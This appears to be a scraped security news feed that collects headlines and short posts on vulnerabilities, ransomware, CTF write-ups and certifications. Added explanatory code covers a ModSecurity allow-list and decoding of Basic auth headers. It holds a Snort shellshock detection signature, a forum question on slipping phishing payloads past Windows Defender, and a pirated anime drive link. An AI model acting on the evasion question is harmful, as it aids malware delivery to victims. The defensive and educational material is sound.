    White House: preparations for quantum computers cracking cryptography are in place
    US President Joe Biden recently signed a National Security Memorandum (NSM) requiring government agencies to take steps to mitigate the risks quantum computers pose to US national cybersecurity.
    Microsoft, Apple and Google to support FIDO passwordless sign-in
    Microsoft, Apple and Google jointly announced plans to expand support for the common passwordless sign-in standard developed by the World Wide Web Consortium and the FIDO Alliance.
    Google patches actively exploited Android kernel vulnerability
    Google recently released the second part of its May security patches for Android, including a fix for an actively exploited Linux kernel vulnerability.
    Millions of users affected: vulnerabilities lurking for nearly 10 years in Avast antivirus disclosed
    On May 5, SentinelLabs published a report stating that it had found two serious vulnerabilities, present for nearly ten years, in the well-known antivirus products Avast and AVG.
    FreeBuf Morning Report | The mystery behind new REvil ransomware operation samples; Ukraine-war-themed documents become hackers' first choice
    The US Department of Defense tricked phishers into paying $23.5 million.
    CSRC issues "Measures for Cybersecurity Management in the Securities and Futures Industry (Draft for Comment)"
    The Measures comprise eight chapters and sixty-six articles covering the cybersecurity supervision and management system for the securities and futures industry, cybersecurity operations, coordinated data security management, cybersecurity emergency response, and more.

    Backdoor from HackTheBox — Detailed Walkthrough
    No content preview
    TryHackMe writeup: Atlas
    No content preview
    I have 1% chance to hack this company
    No content preview
    Clique Writeup — ångstromCTF 2022
    No content preview

    [Security Advisory] F5 BIG-IP iControl REST authentication bypass vulnerability (C...
    F5 recently published a security advisory for its BIG-IP products disclosing a remote authentication bypass vulnerability: an unauthenticated attacker with network access to the BIG-IP system through the management port or self IP addresses can...

    From KBs to CVEs: Understanding the Relationships Between Windows Security Updates and Vulnerabilities
    submitted by /u/derp6996 [link] [comments]
    An Easy Misconfiguration to Make: Hidden Dangers in the Cloud Control Plane
    submitted by /u/ajohnston9 [link] [comments]
    The curious case of mavinject.exe
    submitted by /u/sciencestudent99 [link] [comments]
    A Deep Dive into AvosLocker Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
    submitted by /u/digicat [link] [comments]

    Passed the GCFE exam today
    So glad to get this behind me, now I need to begin applying the information/knowledge and keep learning. submitted by /u/ATXChimera [link] [comments]
    A Deep Dive into AvosLocker Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Starting a DF business...how much work is out there?
    Title pretty much says it all. If someone wanted to be a principal consultant...how much work is out there? submitted by /u/invictusliber [link] [comments]

    Creating a SNORT shellshock rule
    I’m creating a SNORT rule to block shellshock, every time I run this code, I get that it needs to be enclosed in '(' ')'. Like it is in brackets? What am I doing wrong? Alert tcp any any -> $HOME_NET 80 443 (msg: "Shellshock activated"; content: "() {"; sid: 10000000;) Any tips? submitted by /u/LewSm1th [link] [comments]
    Looking for SANS SEC 504 GCIH practice tests.
    Does anyone have any extras to share? submitted by /u/Striking-Regular-725 [link] [comments]

    AMB Bridge: bug bounty program
    As you may already know, we have recently launched the AMB bridge on the Ambrosus testnet! Continue reading on Ambrosus Ecosystem »
    Remote Code Execution Web Application Vulnerability : Code Injection Part
    Remote code execution (RCE) occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or… Continue reading on System Weakness »
    Remote Code Execution Web Application Vulnerability : Code Injection Part
    Remote code execution (RCE) occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or… Continue reading on Medium »
    You should put scope over exploits! Or should you?
    Continue reading on Medium »
    I have 1% chance to hack this company
    Today I will share with you the first vulnerability I found on SerpApi, LLC. Continue reading on InfoSec Write-ups »
    My Pentest Log -17 - (Stack Trace in ASP.NET)
    Greetings from Perama to all, Continue reading on Medium »
    My First Bounty in Hackerone
    Hi, my name is Jagannath Mohanty. I want to tell you about my first bounty on HackerOne. Let's jump to the bug I reported; it was user/email enumeration… Continue reading on Medium »

    What's everyone's favorite phishing framework/tool?
    I think GoPhish is the most popular. I'm going to be playing around with as many as I find over the weekend. I wanted to get some feedback on any favorites you may have used; pros & cons; etc. Thanks in advance for any feedback! submitted by /u/offftherecordz [link] [comments]
    The curious case of mavinject.exe
    submitted by /u/sciencestudent99 [link] [comments]
    What way is currently best for SE payload attacks?
    Microsoft did a huge crackdown on the "evil macros" on office docs about 9 months ago. https://www.zdnet.com/article/microsoft-...el-macros/ It now seems that ANY attempt at creating a shell object in VBS instantly gets flagged by Windows Defender. This used to be bypassed by using an "external" program to create such a shell, i.e. Outlook. So, how can I send my payload now? Sending exes in mail is frowned upon by any spam agency and a plethora of alerts pop up when I do so. Sending a .bat is too sketchy as well and the .lnk trick has also been fixed. submitted by /u/ErikDz11 [link] [comments]

    A brief introduction to OSINT (Open Source Intelligence)
    There are many different types of intelligence, but one that used to be overlooked is open source intelligence (OSINT). Despite being… Continue reading on Medium »

    SecWiki News 2022-05-05 Review
    How RASP detects Java Agent memory shells by ourren; Understanding the principles and flow of the HTTPS key exchange protocol in one article by ourren; What UEBA (User and Entity Behavior Analytics) can be used for (ten scenarios) by h4ck01; Cloud security baselines by h4ck01; Botconf 2022 talks roundup by Avenger; Bug localization using code knowledge graphs by ourren. For more of the latest articles, visit SecWiki.

    Manually Identifying an X-Cart Credit Card Skimmer
    During a recent investigation, a new client came to us reporting that their antivirus had detected a suspicious domain loading on their website’s checkout page. We regularly receive reports like these, as this is a telltale indicator of a credit card skimmer infection. Our research and remediation teams frequently find credit card skimmers on Magento websites, and more recently on WordPress — however, in this case the customer was using a lesser known eCommerce solution known as X-Cart. Continue reading Manually Identifying an X-Cart Credit Card Skimmer at Sucuri Blog.

    DATA INDEXES | 100TB+ DATA COLLECTIVELY | ANIME,COURSES,MOVIES,GUIDES,DBS
    submitted by /u/9NAAGRAAJ [link] [comments]

    PyScript and Security 🐍🗡
    PyScript was unveiled in one of the talks at the recent PyCon US 2022. PyScript is a library that lets you use Python code inside HTML. Since it extends Python, with its enormous versatility and low learning curve, to the web, it has drawn a lot of interest and a lot of debate. Some ask how writing code inside HTML is any different from PHP; I have also seen it described as going against the times. Design patterns and code quality are matters developers will pay the most attention to; since our field is security engineering, it is worth looking at it from a security perspective too, so I spent a few days thinking it over lightly and wrote this up.

    Deep dive into the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472)
    Also known as "Zerologon", this vulnerability has a CVSS score of 10.0 and is billed as taking over a domain controller in 3 seconds; its impact is severe.
    A deep dive into PsExec and smbexec
    An in-depth look at PsExec and smbexec from the angles of how they are used, log analysis and more.
    FreeBuf Morning Report | High-severity DNS vulnerability affects millions of IoT devices; the deepfake threat to cybersecurity grows
    A high-severity vulnerability exists in the Domain Name System (DNS) component of the uClibc library, and millions of IoT devices worldwide that use uClibc will be affected.
    Device takeover risk warning! F5 discloses a critical BIG-IP remote code execution vulnerability
    F5, a global leader in application delivery networking (ADN), recently issued a security warning: its research team observed a critical vulnerability being actively exploited.
    Analysis of the "8220" mining group's activity
    "8220" is a long-active group skilled at exploiting vulnerabilities to attack systems and deploy cryptomining programs.
    Back from the dead! Analysis of in-the-wild attacks by the new REvil ransomware
    In January 2022 Russia's FSB said that, after receiving relevant information provided by the United States, it had completely dismantled REvil and arrested several individuals.
    High-severity DNS vulnerability disclosed, affecting millions of IoT devices
    Through this vulnerability an attacker can carry out DNS poisoning or DNS spoofing attacks and redirect victims to malicious websites instead of legitimate ones.
    Attackers hijack UK NHS email accounts to steal Microsoft login credentials
    According to the investigation, over nearly six months the work email accounts of more than 100 employees of the UK's National Health Service (NHS) were repeatedly used in phishing campaigns, some of which aimed to steal Microsoft login credentials. After hijacking legitimate NHS email accounts, the attackers began using them last October and continued to use them for phishing at least until April this year. According to researchers at email security firm INKY, more than 1,000 phishing emails were sent from the NHS email accounts of employees in England and Scotland. The researchers tracked
    Attackers deploy backdoor to steal Exchange email
    An APT group compromised a corporate network and attempted to steal Exchange email from employees involved in corporate transactions.
    GitHub: all user accounts must enable two-factor authentication by end of 2023
    On May 4, GitHub announced that all developer and user accounts that upload code must enable one or more forms of two-factor authentication (2FA) by the end of 2023.
  • Open

    Github Account Takeover which is used as gradle vcs in "github.com/palantir/gradle-launch-config-plugin"
    Palantir Public disclosed a bug submitted by codermak: https://hackerone.com/reports/1525578 - Bounty: $250
  • Open

    LoNg4j: New Log4j Vulnerability
    Article URL: https://www.cequence.ai/blog/long4j/ Comments URL: https://news.ycombinator.com/item?id=31273048 Points: 4 # Comments: 0
  • Open

    I am starting college, should I start with binary exploitation or web app exploitation to get jobs and internships? I do love binary exploitation, but there are not many jobs in Ireland
    submitted by /u/Traditional-Cloud-80 [link] [comments]
    Which target to pick after learning the basics of binary exploitation, if there is any bug bounty? Sorry if it's a lame question
    submitted by /u/Traditional-Cloud-80 [link] [comments]
    QUESTION
    Hello, everyone. First of all, I want to apologize for my noob question. For a while I've been reading about exploit development, since this field is incredibly interesting to me. Anyway, I came across a video called "The Layman's Guide to Zero-Day Engineering" on YouTube (I wanted to put the link but I don't know if it's allowed) and I was fascinated by the way they developed the exploit for the Safari browser, so I was wondering if exploit developers know every language. I tried to Google my question but I didn't find an answer. Do professionals have to know the programming language to be able to code the exploit? For example, when you write an exploit for (Linux) C you have to know C, but let's say, for example, you want to code an exploit for JIT or V8. Do you learn JavaScript, or do you apply the same knowledge to every exploit regardless of the language? TL;DR (is exploit development independent of language?). Thank you everyone submitted by /u/IBK_0 [link] [comments]
  • Open

    Kernel page feng shui as seen through Pwn2Own CVE-2022-27666
    Author: v1n3gar, f-undefined team. Original link: https://mp.weixin.qq.com/s/JPbwYA2sS9jCMMgwBxONjg Key points: (1) Use msg_msg to build an arbitrary write that tampers with modprobe_path, and handle page faults via FUSE (working around unprivileged users losing access to userfaultfd after 5.11; a wave of CTF challenges is sure to copy this). (2) Because the vulnerable object lives in...
    In-depth analysis of the CVE-2022-21882 Win32k kernel privilege escalation vulnerability
    Author: Topsec Alpha Lab. Original link: https://mp.weixin.qq.com/s/0aDmaEMXae1_tJXFZVdi6Q CVE-2022-21882 is a local privilege escalation vulnerability in Windows that Microsoft patched in the January 2022 security update. This article analyses the root cause of the vulnerability and the exploit in detail. 1. Vulnerability overview CVE-2022-21882 is a bypass of CVE-2021-1732 and belongs to win3...
  • Open

    Hack To Learn: OSINT and Passive Reconnaissance
    Dear Friend, welcome to HaXeZ where I want to talk about Open-source intelligence and passive reconnaissance. Continue reading on System Weakness »
    War in Ukraine / May 3
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Something from the internet…
    Anonymous web browsing, chatting or just being online can be achieved by mixing different OS configurations such as Tails and Qubes OS… Continue reading on Medium »
    Keeber NahamCon CTF 2022 [OSINT]
    Keeber 1 Continue reading on Medium »
    NahamCon 2022 CTF — Keeber 1, 2, 3, 5
    As part of NahamCon 2022, a 48-hour CTF event was hosted leading up to security conference itself. Continue reading on Medium »
  • Open

    Clickjacking Vulnerability Can Lead To Deletion Of Developer App
    TikTok disclosed a bug submitted by rioncool22: https://hackerone.com/reports/1416612 - Bounty: $500
    One Click Account Hijacking via Unvalidated Deeplink
    TikTok disclosed a bug submitted by fr4via: https://hackerone.com/reports/1500614 - Bounty: $10000
    URL Scheme misconfiguration on TikTok for iOS
    TikTok disclosed a bug submitted by glassplant: https://hackerone.com/reports/1437294 - Bounty: $500
  • Open

    How i found a vulnerability that leads to access any users’ sensitive data and got $500
    Hello everyone! Continue reading on Medium »
    0-click RCE in Electron Applications
    0-click RCE in Electron Applications Continue reading on Medium »
    Business Logic Errors - Art of Testing Cards
    Summary : Continue reading on Medium »
    CVE-2022–25262
    CVE-2022–25262 Continue reading on Medium »
    Information leakage in EXIF data of images(EXIF Data Exposure)
    Summary : Continue reading on Medium »
    Hack the HAckers
    While reading my feeds I came across “hacking the hackers” Heading , so I think lets try finding bugs on THM ( Try HacK Me ) . Continue reading on Medium »
  • Open

    Block all user agents with modsecurity except one?
    I want to block all user agents from my server except for one specific user agent string. How would I create a rule(s) to do this? Thanks! submitted by /u/BelugaBilliam [link] [comments]
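    As an added example, not from the post or from the ModSecurity project: what the post asks for is an allow-list, so the ModSecurity side is a pair of phase-1 rules, one denying when the header is absent (`SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "id:1001,phase:1,deny,status:403"`) and one denying when it is not byte-for-byte equal to the allowed string (`SecRule REQUEST_HEADERS:User-Agent "!@streq ExampleAgent/1.0" "id:1002,phase:1,deny,status:403"`). The Python below renders those two rules and mirrors their decision logic over constructed requests, so you can see why an exact or anchored match is required and why `@contains` or an unanchored `@rx` lets any client that embeds the string through. `ExampleAgent/1.0`, the rule IDs and the sample headers are assumptions.

```python
import re
from typing import Callable, Dict, List, Optional

# Assumed allow-listed User-Agent; substitute the real client string.
ALLOWED_UA = "ExampleAgent/1.0"


def render_secrules(agent: str, base_id: int = 1001) -> str:
    """Emit the two ModSecurity rules: deny when the header is absent,
    deny when it is not byte-for-byte equal to the allowed string.
    Rule IDs are assumed; pick ones free in your rule set."""
    escaped = agent.replace('"', '\\"')
    return "\n".join([
        f'SecRule &REQUEST_HEADERS:User-Agent "@eq 0" '
        f"\"id:{base_id},phase:1,deny,status:403,msg:'No User-Agent'\"",
        f'SecRule REQUEST_HEADERS:User-Agent "!@streq {escaped}" '
        f"\"id:{base_id + 1},phase:1,deny,status:403,msg:'User-Agent not allow-listed'\"",
    ])


Policy = Callable[[Optional[str]], str]


def decide_exact(ua: Optional[str]) -> str:
    """What the rule pair above does: missing or non-identical header is denied."""
    if ua is None:
        return "deny"
    return "allow" if ua == ALLOWED_UA else "deny"


def decide_substring(ua: Optional[str]) -> str:
    """A '@contains'-style check: any client that embeds the string gets through."""
    if ua is None:
        return "deny"
    return "allow" if ALLOWED_UA in ua else "deny"


_UNANCHORED = re.compile(re.escape(ALLOWED_UA))
_ANCHORED = re.compile(r"^" + re.escape(ALLOWED_UA) + r"$")


def decide_unanchored_regex(ua: Optional[str]) -> str:
    """'@rx ExampleAgent/1.0' without ^ and $: same weakness as the substring check."""
    if ua is None:
        return "deny"
    return "allow" if _UNANCHORED.search(ua) else "deny"


def decide_anchored_regex(ua: Optional[str]) -> str:
    """'@rx ^ExampleAgent/1\\.0$': equivalent to the exact match."""
    if ua is None:
        return "deny"
    return "allow" if _ANCHORED.search(ua) else "deny"


# Constructed sample requests (header maps only); none were captured from a real host.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"User-Agent": "ExampleAgent/1.0"},                             # the real client
    {"User-Agent": "ExampleAgent/1.0 Mozilla/5.0"},                 # allowed string at the front
    {"User-Agent": "Mozilla/5.0 (compatible; ExampleAgent/1.0)"},   # allowed string mid-header
    {"User-Agent": "exampleagent/1.0"},                             # case differs
    {},                                                             # header missing entirely
]


def evaluate(policy: Policy) -> List[str]:
    """Run one policy over every sample request and return the verdicts in order."""
    return [policy(r.get("User-Agent")) for r in SAMPLE_REQUESTS]


if __name__ == "__main__":
    print(render_secrules(ALLOWED_UA))
    for p in (decide_exact, decide_substring, decide_unanchored_regex, decide_anchored_regex):
        print(f"{p.__name__:25s} {evaluate(p)}")
```

    Only the exact and anchored variants deny the three look-alike headers. Keep in mind that the User-Agent is chosen by the client, so this is a nuisance filter against stray scanners, not authentication; anyone who learns the allowed string can send it.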
    Huawei Network device compliance audit
    Hello!! I am looking for some guidance on how to conduct CIS compliance scans for my Huawei network devices. I use a bunch of other tools such as Tripwire, Nexpose and some NSPMs for non-Huawei nodes, but Huawei devices are not supported by any of them (at least out of the box). Any guidance? Thanks. submitted by /u/Due-Brick6204 [link] [comments]
    Overcoming imposter syndrome very early on
    After getting some help desk experience I decided to apply to more security-focused roles and have been given an interview as a security consultant. I am very nervous and because of this I am already considering whether I will be good enough. It will be the longest interview I’ve done in my life (1 hour+). I do not meet most of the desirable skills, maybe about 3/5. How can I overcome this and how should I prepare well? I really want this role as I want to push myself. The interview will be held by a senior in the company so I don’t want to say anything silly and completely mess up the interview submitted by /u/amvn92 [link] [comments]
    I fucked up and I don't know what to do, please, I need advice
    I recently started browsing r/hacking and I saw a video about a streaming site that started recently. The site was heavily publicized by a YouTuber for its horrible UI, so I visited it to see if the site was really that ugly. I went to Google and searched for "test site online" and I found a website that lets you run a (not full) security check; it just checks if the site is HTTPS and so on. Right after that one I also found a site that said SQLMAP test. The site had just three options: a URL textbox, a Submit button, a Reset button. I put the site there and two popups were shown: the first said "no major issues" and the second printed a log, and a popup was shown saying "you must be authorized to use this on the site". I didn't even fucking know what SQLMAP was before I looked it up after the popup came to the foreground. Am I going to jail? I had a panic attack and I cried for an hour. I was just browsing my phone and I thought it would be fun to see if the site was botched or not. I'm panicking, what's wrong with me submitted by /u/__subroutine__ [link] [comments]
  • Open

    Write Blocker
    What write blocker do you recommend using when creating a forensic image of a drive? submitted by /u/Beep-Boop-Bop-Boop [link] [comments]
    GCFA failed :( help required
    Hi guys, I recently failed my GCFA after getting around 60%. I think I made the mistake of frequently referring to the index and books, and at the end I was left with 5 lab questions. Now I’m planning to re-appear for the exam. Can anyone guide me or give any leads on what I’m missing or need to work on? Thanks PS. Got above 75% in both practice exams submitted by /u/Mushroom-Fuzzy [link] [comments]
    GCFA Poster Question
    I will be taking my GCFA exam soon and was wondering which posters you printed out that were most helpful to you? Thank you submitted by /u/joe_dro [link] [comments]
  • Open

    Cyberwar In Ukraine Hackers Are Hacking Russia
    submitted by /u/cybersocdm [link] [comments]
    Hacking Power Plants and Industrial Control Systems
    submitted by /u/cybersocdm [link] [comments]
    Update on cyber activity in Eastern Europe
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-05-04 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    ELFLoader: Another In Memory Loader Post
    Intro Now that BOFs are commonplace for Windows agents, some people have talked about wanting a version that is not Windows-only. In this blog post, we’ve got something for you: the same thing but for Linux/Mac. The process of building in-memory loaders is the same, no matter the file format type. In this case, we’ll just... The post ELFLoader: Another In Memory Loader Post appeared first on TrustedSec.
  • Open

    NahamCon 2022 CTF Write-up: “No Space Between Us” Challenge
    No content preview
    Rate Limiting attack bypassing invisible captcha
    No content preview
  • Open

    Big Collection For Anime Fans
    15TB of anime (series-movies) https://drive.google.com/drive/folders/1vSdJo_OrJNgVIRYsvTwR-PeLyM8L-V0M submitted by /u/NELARO [link] [comments]
  • Open

    Shady economics of proxy services
    submitted by /u/rushter_ [link] [comments]
    Authenticating with certificates when PKINIT is not supported
    submitted by /u/the-useless-one [link] [comments]
    Themes from Real World Crypto 2022
    submitted by /u/yossarian_flew_away [link] [comments]
    Exploiting Dynamic Linking Procedure In x64 ELF Binaries
    submitted by /u/paran0ide [link] [comments]
  • Open

    FreeBuf Morning Report | Putin orders all ministries and agencies to set up IT security departments; pro-Ukraine hackers DDoS Russian websites
    Putin signed a presidential decree on additional measures to ensure Russia's information security, ordering the creation of an IT security department in every ministry, agency and backbone organisation.
  • Open

    Critical vulnerability in the Matrix IRC bridge
    Article URL: https://matrix.org/blog/2022/05/04/0-34-0-security-release-for-matrix-appservice-irc-high-severity/ Comments URL: https://news.ycombinator.com/item?id=31257915 Points: 91 # Comments: 13
  • Open

    Putting It All Together
    It's great when a plan, or a puzzle, comes together, isn't it?  I'm not just channeling my inner Hannibal Smith...I'm talking about bringing various pieces or elements together to build a cohesive, clear picture, connecting the dots into a cohesive analysis. To kick this off, Florian had this to say about threat actors moving to using ISO/IMG files as result of Microsoft disabling VBA macros in docs downloaded from the Internet, a change which results in entirely new artifact constellations. After all, a change in TTPs is going to result in changes as to how the system is impacted, and a change in the resultant constellations. So, this sets the stage for our example. In this case, the first piece of the puzzle is this tweet from Max_Mal_, which points to the BumbleBee campaign (more info f…

  • Open

    Master or Certs
    Hey Everyone, I am graduating in August with my Bachelor’s in Computer Forensics/Digital Investigations. Is it better to stay and get my Masters or graduate with a Bachelors and work on getting some certificates? Thanks! submitted by /u/chungusXL316 [link] [comments]
    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Useful Security Tools and Resources for Digital Forensics
    submitted by /u/Khaotic_Kernel [link] [comments]
    Nozomi Networks Discovers Unpatched DNS Bug in Popular C Standard Library Putting IoT at Risk
    submitted by /u/39816561 [link] [comments]
    Privilege escalation vulnerabilities discovered in Linux known as Nimbuspwn
    submitted by /u/sciencestudent99 [link] [comments]
    New update from Google's Threat Analysis Group finds numerous APTs running campaigns in Ukraine and Est. Europe, including Fancy Bear (Russia), Ghostwriter (Belarus) and Curious Gorge (China).
    submitted by /u/Ramsey_Power [link] [comments]
    Compromising Read-Only Containers with Fileless Malware
    submitted by /u/MiguelHzBz [link] [comments]
    AvosLocker Ransomware Variant Abuses Avast Anti-Rootkit Driver File to Disable Anti-Virus
    submitted by /u/campuscodi [link] [comments]
    Zyxel firmware extraction and password analysis
    submitted by /u/0xdea [link] [comments]
    Hacking a Bank by Finding a 0day in dotCMS
    submitted by /u/Mempodipper [link] [comments]
    DOing Harm
    submitted by /u/netsecfriends [link] [comments]
  • Open

    Can someone find me by my Bluetooth address knowing only my phone number?
    I’m a bit confused and shocked about what happened. TL;DR: Someone sent me a message on WhatsApp saying "are you at this coffee shop?" And yes, I was. Here is the story: I’m a freelancer and I took a gig from someone whom I have never met. I added his number to my contacts and we’ve been texting on WhatsApp regarding the gig. That was in 2019 and the gig lasted for about a couple of months. Fast forward to 2022, a few days ago: I was at a coffee shop and I got a text on WhatsApp from that person asking me if I’m at that same coffee shop! I told him yes, but how did you know? He said “I turned on my Bluetooth to connect to my headphones and it showed me that “my name” is nearby” (the name he saved in his contacts). Some facts: that person never heard my voice; he does not know what I look like; I have an iPhone (I don’t know what phone he has); my Bluetooth name is “iPhone” (not unique). I’m mind blown how that happened and whether he is actually telling the truth. Does WhatsApp map my Bluetooth address to my phone number somehow? (Or maybe a different app?) I know it’s theoretically possible but as far as I know, Apple iOS does not allow that kind of mapping submitted by /u/i_R7AL [link] [comments]
    Not able to connect with DNS server
    Hi all, I have had a problem with my laptop for two days, which basically is that I can't use any browser because a message appears saying "We have problems finding that site" and then it says "We can't connect to (website searched)". I've tried some things like resetting the DNS cache, also resetting the router and more possible solutions I found on the internet, but none of them worked. I use Mozilla Firefox and it has this problem, and I tried Google Chrome and Microsoft Edge and they also have the same problem. The curious thing is that I can use Tor Browser without any problem and make daily use of it. I also used the computer's problem-solving system and ran it to find any problem with the internet connection; after that, it says the problem is that the DNS server is not responding, but also that it is a problem that can't be solved automatically by the system. Also, I tried to scan my computer with the Avast antivirus program, but the computer is not able to open it, so I can't scan in case there is any virus or malware. I used the Microsoft scan that comes with the system and it says that there is no virus or malware found. I also just saw that some apps like Steam or Netflix are not working because they are also not receiving a signal from the DNS server, I suppose, and for that reason don't have internet. Thank you for reading and for trying to figure out a solution. I need my laptop running as always for school work and projects, so any help you can give me would be great. submitted by /u/12d12g [link] [comments]
    Introducing security processes in a company from the ground-up
    Hey all, Recently I had a discussion with one of my colleagues about introducing some security processes in our organization. It has been in the pipeline for some time now and we figured that we should probably start working on it while the company is not that big. Plus, we started seeing some occasional DDoS attacks recently (nothing too major or disruptive, but enough to raise some alarms). What I am curious about is: How would you tackle this problem? How would you prioritize tasks that should be done? How would you get non-tech people on board to follow those best practices? What are some technical solutions that come to mind? To put some context to all of the above: the company doesn't hold any sensitive data (medical records, financial records or credit card numbers), although I would like to hear your opinion on those as well. We are an e-learning platform with a significant user base and people do follow some obvious best practices, like: using password managers, using 2FA (not enforcing it though, but we should), giving access to resources only to people that really need them to perform their job, doing frequent backups, etc. I am a dev with some nice and broad experience in the field. Even though I can navigate my way around IT concepts and security, I've never actually worked in such a role and I don't really know where to start, so any help is much appreciated. :) submitted by /u/d_lipovac [link] [comments]
    Insecure Request Practice
    Hi guys! I saw a practice one of these days which involved adding the user and password to the headers of a request and encoding them with base64. Is this actually correct? If not, what would be the best way to fix it? I feel like that way of doing it is quite insecure submitted by /u/Mokushi99 [link] [comments]
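    As an added example, not from the post: the practice described is HTTP Basic authentication (RFC 7617), in which base64 is an encoding rather than encryption. The Python below decodes a constructed Authorization header to show the credentials come straight back out, builds the header the way a client does, and audits a constructed request capture for Basic credentials sent over plain http, which is the condition that makes the practice dangerous. The hostnames, paths and credentials are made up.

```python
import base64
import binascii
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit


def decode_basic_auth(header_value: str) -> Optional[Tuple[str, str]]:
    """Recover (user, password) from an 'Authorization: Basic <b64>' header value.
    Returns None if the scheme is not Basic or the token is not well-formed.
    Anyone who can read the header can do this; base64 hides nothing."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token.strip():
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    user, sep, password = raw.decode("utf-8", errors="replace").partition(":")
    if not sep:
        return None  # RFC 7617 requires the 'user-id ":" password' form
    return user, password


def encode_basic_auth(user: str, password: str) -> str:
    """Build the header value a client sends; the user-id may not contain ':'."""
    if ":" in user:
        raise ValueError("user-id must not contain ':'")
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


Capture = List[Tuple[str, Dict[str, str]]]


def find_exposed_credentials(capture: Capture) -> List[Tuple[str, str]]:
    """Return (url, user) for every request that carries Basic credentials over a
    non-https URL, i.e. credentials recoverable by anyone on the network path.
    The same header inside TLS is not reported: the transport is what protects it."""
    exposed: List[Tuple[str, str]] = []
    for url, headers in capture:
        auth = headers.get("Authorization")
        if not auth:
            continue
        creds = decode_basic_auth(auth)
        if creds is None:
            continue
        if urlsplit(url).scheme.lower() != "https":
            exposed.append((url, creds[0]))
    return exposed


# Constructed sample capture; hostnames, paths and credentials are made up.
SAMPLE_CAPTURE: Capture = [
    ("http://api.example.test/v1/orders", {"Authorization": "Basic YWxpY2U6czNjcmV0"}),   # alice:s3cret, in the clear
    ("https://api.example.test/v1/orders", {"Authorization": "Basic YWxpY2U6czNjcmV0"}),  # same header, inside TLS
    ("http://api.example.test/health", {}),                                                # no credentials at all
    ("http://api.example.test/v1/me", {"Authorization": "Bearer not-a-basic-token"}),      # different scheme, ignored
]


if __name__ == "__main__":
    print(decode_basic_auth("Basic YWxpY2U6czNjcmV0"))
    print(encode_basic_auth("alice", "s3cret"))
    print(find_exposed_credentials(SAMPLE_CAPTURE))
```

    Basic auth over TLS is a common and acceptable pattern for machine-to-machine APIs when the secret is a dedicated, rotatable per-client credential rather than a person's real password; the usual failures are sending it over plain http, writing the header into logs, or redirecting from https to http so the client resends it unprotected.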
    Block legacy protocols for Microsoft applications
    Hi there. I want to block all the old protocols, but I'm afraid that this could lead to availability risks for some applications. Right now I see that only one application, Office 365 Exchange Online, is using legacy protocols: IMAP, Exchange Web Services, SMTP, Exchange ActiveSync, MAPI over HTTP, Offline Address Book, Autodiscover, Exchange Online PowerShell, POP. How can I understand whether there will be risks to the usage of Office 365 Exchange Online if I block legacy protocols? https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/block-legacy-authentication submitted by /u/athanielx [link] [comments]
  • Open

    Etcd Integrates Continuous Fuzzing
    Article URL: https://www.cncf.io/blog/2022/04/13/etcd-integrates-continuous-fuzzing/ Comments URL: https://news.ycombinator.com/item?id=31254099 Points: 1 # Comments: 0
    Fuzzing Like a Caveman
    Article URL: https://h0mbre.github.io/Fuzzing-Like-A-Caveman/ Comments URL: https://news.ycombinator.com/item?id=31249559 Points: 2 # Comments: 0
    Advanced Go Fuzzing Techniques
    Article URL: https://blog.fuzzbuzz.io/writing-effective-go-fuzz-tests/ Comments URL: https://news.ycombinator.com/item?id=31249130 Points: 3 # Comments: 1
  • Open

    Ni Macron, ni Le Pen
    France election results and the country’s political void Continue reading on Medium »
    War in Ukraine / May 2
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Free applications and services for security specialist…
    Let’s talk about those free applications and services that a security specialist should definitely put on a smartphone and computer. First… Continue reading on Medium »
    Maltego Transforms List
    A list of tools that handle different data and make it usable in Maltego. Continue reading on Medium »
    Information gathering from instagram accounts
    Hello guys, my name is Arshia and I'm coming with another interesting tutorial, and in this tutorial you will learn how to gather… Continue reading on Medium »
  • Open

    How I got a lousy T-Shirt from the Dutch Government.
    Hello everyone,  my name is Max. I’m a Computer Science student and ethical hacker from Germany. Today I want to tell you how I hacked the… Continue reading on Medium »
    Denial of Service through …
    Today let us learn about Denial of service Continue reading on Medium »
    A Guide For Advanced Message Protected API Hacking Using Hackvertor and Burp (part 2)
    More up-to-date Hackvertor game-changer techniques, code examples, and tips for advanced API penetration testing and bug bounty. Continue reading on Medium »
    Open Redirect Vulnerability
    We’ll begin our discussion with open redirect vulnerabilities, which occur when a target visits a website and that website sends their… Continue reading on Medium »
    NahamCon CTF 2022 — Web Exploitation — All Challenges — Writeup
    Flaskmetal Alchemist ( Medium) Continue reading on Medium »
  • Open

    Apple Silicon Exclusively Hit with World-First “Augury” DMP Vulnerability
    Article URL: https://www.tomshardware.com/news/apple-silicon-exclusively-hit-with-world-first-augury-dmp-vulnerability Comments URL: https://news.ycombinator.com/item?id=31252031 Points: 2 # Comments: 0
    Responsible Disclosure: 6000 Vulnerability Submissions Later
    Article URL: https://www.danielmakelley.com/responsible-disclosure-6-000-vulnerability-submissions/ Comments URL: https://news.ycombinator.com/item?id=31251551 Points: 3 # Comments: 0
    Vuls: Agent-less vulnerability scanner for Linux, FreeBSD
    Article URL: https://github.com/future-architect/vuls Comments URL: https://news.ycombinator.com/item?id=31250171 Points: 18 # Comments: 1
  • Open

    SecWiki News 2022-05-03 Review
    How to write research papers? by ourren. For more of the latest articles, visit SecWiki
  • Open

    The ABCs of Kerberoasting
    Introduction Continue reading on InfoSec Write-ups »
    Shibboleth from HackTheBox — Detailed Walkthrough
    No content preview
    THM Writeup: Ra
    No content preview
  • Open

    WooCommerce Credit Card Skimmers Concealed In Fake Images
